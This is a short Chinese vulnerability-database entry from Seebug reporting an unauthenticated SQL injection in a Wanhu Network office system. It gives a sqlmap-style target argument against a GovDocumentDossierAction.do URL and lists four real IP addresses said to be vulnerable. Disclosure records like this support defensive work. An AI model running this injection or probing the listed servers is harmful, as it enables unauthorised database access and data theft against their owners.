万户网络 无条件SQL注入

2014-09-15T00:00:00
ID SSV:96188
Type seebug
Reporter Root
Modified 2014-09-15T00:00:00

Description

简要描述:

详细说明:

验证地址: -u "http://222.178.221.54:7001/defaultroot/GovDocumentDossierAction.do?id=1&flag=sendFile" --dbms="Microsoft SQL Server" 存在漏洞地址: http://119.254.81.197:7001 http://61.191.17.216:7001 http://219.136.247.248:7001/ http://222.178.221.54:7001

漏洞证明:

<img src="https://images.seebug.org/upload/201409/131729116df26edc533d01b9b0debf9bbf0ba85c.jpg" alt="456456.jpg" width="600" onerror="javascript:errimg(this);">

由于是 延时盲注 数据出来较慢 我就不截图了,您可以自己验证下。